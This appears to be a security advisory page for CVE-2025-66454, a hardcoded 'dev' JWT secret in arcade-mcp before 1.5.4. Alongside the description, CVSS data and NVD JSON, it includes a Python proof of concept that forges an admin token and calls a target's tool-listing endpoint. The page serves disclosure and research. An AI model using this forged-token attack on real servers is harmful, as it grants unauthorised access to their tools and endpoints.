Security Vulnerability Report
中文
CVE-2025-66454 CVSS 6.5 MEDIUM

CVE-2025-66454

Published: 2025-12-02 19:15:53
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Arcade MCP allows you to to create, deploy, and share MCP Servers. Prior to 1.5.4, the arcade-mcp HTTP server uses a hardcoded default worker secret ("dev") that is never validated or overridden during normal server startup. As a result, any unauthenticated attacker who knows this default key can forge valid JWTs and fully bypass the FastAPI authentication layer. This grants remote access to all worker endpoints—including tool enumeration and tool invocation—without credentials. This vulnerability is fixed in 1.5.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

arcade-mcp < 1.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt import datetime # CVE-2025-66454 PoC - Forge JWT using hardcoded 'dev' key # Affected versions: arcade-mcp < 1.5.4 HARDCODED_SECRET = "dev" TARGET_URL = "http://<target>/mcp/v1/list_tools" def forge_jwt(): """ Generate a forged JWT token using the hardcoded 'dev' secret. This bypasses authentication on arcade-mcp servers < 1.5.4 """ payload = { "sub": "attacker", "role": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=24), "iat": datetime.datetime.utcnow() } # Sign with the hardcoded 'dev' key token = jwt.encode(payload, HARDCODED_SECRET, algorithm="HS256") return token def exploit(): """ Exploit authentication bypass by sending forged JWT """ import requests forged_token = forge_jwt() headers = { "Authorization": f"Bearer {forged_token}" } # List tools (enumeration) response = requests.get(TARGET_URL, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}") return response if __name__ == "__main__": forge_jwt() # Uncomment to execute exploit: # exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66454", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:52.683", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arcade MCP allows you to to create, deploy, and share MCP Servers. Prior to 1.5.4, the arcade-mcp HTTP server uses a hardcoded default worker secret (\"dev\") that is never validated or overridden during normal server startup. As a result, any unauthenticated attacker who knows this default key can forge valid JWTs and fully bypass the FastAPI authentication layer. This grants remote access to all worker endpoints—including tool enumeration and tool invocation—without credentials. This vulnerability is fixed in 1.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/ArcadeAI/arcade-mcp/commit/44660d18ceb220600401303df860a31ca766c817", "source": "[email protected]"}, {"url": "https://github.com/ArcadeAI/arcade-mcp/pull/691", "source": "[email protected]"}, {"url": "https://github.com/ArcadeAI/arcade-mcp/security/advisories/GHSA-g2jx-37x6-6438", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.